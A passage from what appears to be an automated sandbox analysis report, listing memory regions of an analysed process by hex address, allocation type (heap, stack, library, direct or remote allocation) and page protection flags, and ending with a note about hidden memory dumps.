page read and write
272921E8000
trusted library allocation
page read and write
272A87DF000
heap
page read and write
88B4000
heap
page read and write
2A50000
trusted library allocation
page read and write
436E000
stack
page read and write
23FA0000
remote allocation
page read and write
8940000
heap
page read and write
7F0E000
stack
page read and write
2728E606000
heap
page read and write
6EB4000
heap
page read and write
83A000
trusted library allocation
page execute and read and write
88EE000
heap
page read and write
44E1000
trusted library allocation
page read and write
813000
trusted library allocation
page execute and read and write
272900D0000
heap
page execute and read and write
2728E540000
heap
page read and write
44C0000
heap
page execute and read and write
272A8836000
heap
page read and write
A9EE54B000
stack
page read and write
6FD0000
heap
page execute and read and write
68EB000
stack
page read and write
272A8690000
heap
page read and write
26BD0000
direct allocation
page read and write
3A0000
heap
page read and write
23DF0000
direct allocation
page read and write
8921000
heap
page read and write
2412E000
stack
page read and write
272922F6000
trusted library allocation
page read and write
7FFD9B980000
trusted library allocation
page read and write
7FFD9B79B000
trusted library allocation
page read and write
6EF0000
heap
page read and write
2728E775000
heap
page read and write
272A880C000
heap
page read and write
6D92000
heap
page read and write
2556000
heap
page read and write
8959000
heap
page read and write
829000
trusted library allocation
page read and write
2728E777000
heap
page read and write
8310000
direct allocation
page read and write
272A888B000
heap
page read and write
A9EE44E000
stack
page read and write
2728E670000
trusted library allocation
page read and write
272904DD000
trusted library allocation
page read and write
272A889B000
heap
page read and write
82D0000
direct allocation
page read and write
6B70000
heap
page read and write
442E000
stack
page read and write
8610000
direct allocation
page read and write
272A073A000
trusted library allocation
page read and write
54E1000
trusted library allocation
page read and write
7C10000
trusted library allocation
page execute and read and write
7C90000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
A3D000
stack
page read and write
2FDF000
unkown
page read and write
A9ED27E000
stack
page read and write
85FF000
stack
page read and write
34A000
stack
page read and write
7190000
trusted library allocation
page read and write
6D96000
remote allocation
page execute and read and write
800000
trusted library allocation
page read and write
6EF9000
heap
page read and write
2728E5F4000
heap
page read and write
8620000
direct allocation
page read and write
7140000
trusted library allocation
page read and write
824E000
stack
page read and write
7FFD9B9C0000
trusted library allocation
page read and write
44AE000
stack
page read and write
3F0000
heap
page read and write
8940000
direct allocation
page execute and read and write
BC76000
direct allocation
page execute and read and write
27290894000
trusted library allocation
page read and write
8196000
remote allocation
page execute and read and write
788000
heap
page read and write
87F0000
heap
page read and write
828C000
stack
page read and write
27291A9A000
trusted library allocation
page read and write
7FFD9B8A0000
trusted library allocation
page execute and read and write
2A40000
trusted library allocation
page execute and read and write
86F0000
direct allocation
page read and write
2DE0000
heap
page read and write
2BC0000
heap
page read and write
272921F6000
trusted library allocation
page read and write
6FA0000
trusted library allocation
page read and write
696E000
stack
page read and write
7FB2000
heap
page read and write
7FFD9B93A000
trusted library allocation
page read and write
7CB0000
trusted library allocation
page read and write
23E00000
direct allocation
page read and write
2A5D000
stack
page read and write
2550000
heap
page read and write
272A8667000
heap
page execute and read and write
44D0000
heap
page read and write
272A0749000
trusted library allocation
page read and write
7796000
remote allocation
page execute and read and write
8720000
heap
page read and write
8956000
heap
page read and write
8380000
direct allocation
page read and write
8600000
direct allocation
page read and write
2728E770000
heap
page read and write
6B60000
heap
page read and write
4596000
remote allocation
page execute and read and write
B4F000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page read and write
702E000
stack
page read and write
7170000
trusted library allocation
page read and write
81D000
trusted library allocation
page execute and read and write
7FFD9B9F0000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
272908EF000
trusted library allocation
page read and write
86C0000
direct allocation
page read and write
8660000
direct allocation
page read and write
D18000
heap
page read and write
850000
heap
page read and write
2728E795000
heap
page read and write
7DF4EE5C0000
trusted library allocation
page execute and read and write
446E000
stack
page read and write
7FFD9B78D000
trusted library allocation
page execute and read and write
272921FA000
trusted library allocation
page read and write
7C20000
heap
page read and write
2AC3000
heap
page read and write
7F70000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
81D0000
trusted library allocation
page execute and read and write
2EC000
stack
page read and write
706E000
stack
page read and write
2728E740000
heap
page execute and read and write
27290FE3000
trusted library allocation
page read and write
880000
heap
page readonly
242AE000
stack
page read and write
5509000
trusted library allocation
page read and write
6A6B000
stack
page read and write
272A8770000
heap
page read and write
B276000
direct allocation
page execute and read and write
7FFD9BA30000
trusted library allocation
page read and write
5996000
remote allocation
page execute and read and write
44D8000
heap
page read and write
272A84D9000
heap
page read and write
7E6C000
stack
page read and write
328000
stack
page read and write
7CA0000
trusted library allocation
page read and write
8300000
direct allocation
page read and write
7FFD9BAF0000
trusted library allocation
page read and write
240AC000
stack
page read and write
241EC000
stack
page read and write
2ACF000
heap
page read and write
7FFD9BA90000
trusted library allocation
page read and write
A9EE5CB000
stack
page read and write
8700000
direct allocation
page read and write
870000
trusted library allocation
page read and write
4543000
trusted library allocation
page read and write
70AE000
stack
page read and write
44C5000
heap
page execute and read and write
24B0000
heap
page readonly
2728E470000
heap
page read and write
74E000
stack
page read and write
2E03000
heap
page read and write
2C90000
heap
page read and write
7110000
trusted library allocation
page read and write
272A8499000
heap
page read and write
A9ED7FE000
stack
page read and write
259F000
stack
page read and write
7FBA000
heap
page read and write
30DF000
stack
page read and write
27290DE0000
trusted library allocation
page read and write
31D0000
heap
page read and write
29EC000
stack
page read and write
82E0000
direct allocation
page read and write
6E80000
heap
page read and write
A9ED8F9000
stack
page read and write
3A60000
remote allocation
page execute and read and write
2728E6B0000
heap
page read and write
30B000
stack
page read and write
2728E556000
heap
page read and write
8A76000
direct allocation
page execute and read and write
7160000
trusted library allocation
page read and write
272A886F000
heap
page read and write
4DD4000
trusted library allocation
page read and write
8650000
direct allocation
page read and write
7FFD9B784000
trusted library allocation
page read and write
272A8886000
heap
page read and write
4EEE000
trusted library allocation
page read and write
3ED000
stack
page read and write
7F4E000
stack
page read and write
8670000
direct allocation
page read and write
7FFD9B9E0000
trusted library allocation
page read and write
2728E4D0000
heap
page read and write
86D0000
direct allocation
page read and write
8680000
direct allocation
page read and write
2401F000
stack
page read and write
A9ED4FE000
stack
page read and write
85A000
heap
page read and write
8630000
direct allocation
page read and write
82B0000
trusted library allocation
page read and write
7C6E000
stack
page read and write
23EAF000
stack
page read and write
9476000
direct allocation
page execute and read and write
71EC000
stack
page read and write
272908D3000
trusted library allocation
page read and write
A9ED2FD000
stack
page read and write
2A90000
heap
page read and write
8370000
direct allocation
page read and write
298E000
stack
page read and write
272919F8000
trusted library allocation
page read and write
23FDE000
stack
page read and write
2426D000
stack
page read and write
820000
trusted library allocation
page read and write
8320000
direct allocation
page read and write
27290100000
heap
page read and write
A9EE3CF000
stack
page read and write
5673000
trusted library allocation
page read and write
7FE4000
heap
page read and write
2728E790000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
253C000
stack
page read and write
69AD000
stack
page read and write
There are 446 hidden memdumps, click here to show them.